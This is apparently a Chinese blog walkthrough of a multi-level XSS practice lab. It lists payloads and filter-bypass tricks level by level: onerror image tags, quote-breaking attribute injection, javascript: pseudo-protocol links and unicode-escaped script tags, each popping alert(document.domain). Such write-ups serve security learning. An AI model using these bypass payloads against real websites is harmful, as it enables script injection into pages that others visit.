标签:pre javascrip ike 元素 修改 doc err java image
没有过滤
<img src=1 onerror=alert(document.domain)>
输入第一关的payload
查看源码
"><img src=1 onerror=alert(document.domain)>
发现字符被转义
抓包,发现有两个参数
修改第二个参数
抓包发现有三个参数
修改第三个参数
发现还是没有弹窗,查看源码
修改第三个参数
发现限制了输入框的长度
查看元素,修改长度
发现没有过滤引号,但是尖括号被HTML实体转义了
使用事件触发XSS
没有引号,使用事件
href 可以使用伪协议,然后点击
javascript:alert(document.domain)
发现domain被过滤了
过滤了事件
<script>标签也不行
想到还可以使用javascript伪协议
发现s还是有问题,于是先编码试试
"><a href=javascript:alert(document.domain)>1</a>
去网上找了找大佬们写的,发现使用`,在IE下解析成引号
dom型
输入<img src=1 onerror=alert(1)>
发现过滤了<>输入在<script>标签中,使用编码
\u003c\u0073\u0063\u0072\u0069\u0070\u0074\u003ealert(document.domain)\u003c\u002f\u0073\u0063\u0072\u0069\u0070\u0074\u003e
输入之后\都被过滤了
\\u003c\\u0073\\u0063\\u0072\\u0069\\u0070\\u0074\\u003ealert(document.domain)\\u003c\\u002f\\u0073\\u0063\\u0072\\u0069\\u0070\\u0074\\u003e
\\u003c\\u0073\\u0063\\u0072\\u0069\\u0070\\u0074\\u003ealert(document.domain)\\u003c\\u002f\\u0073\\u0063\\u0072\\u0069\\u0070\\u0074\\u003e
标签:pre javascrip ike 元素 修改 doc err java image
原文地址:https://www.cnblogs.com/zmqqq/p/10818568.html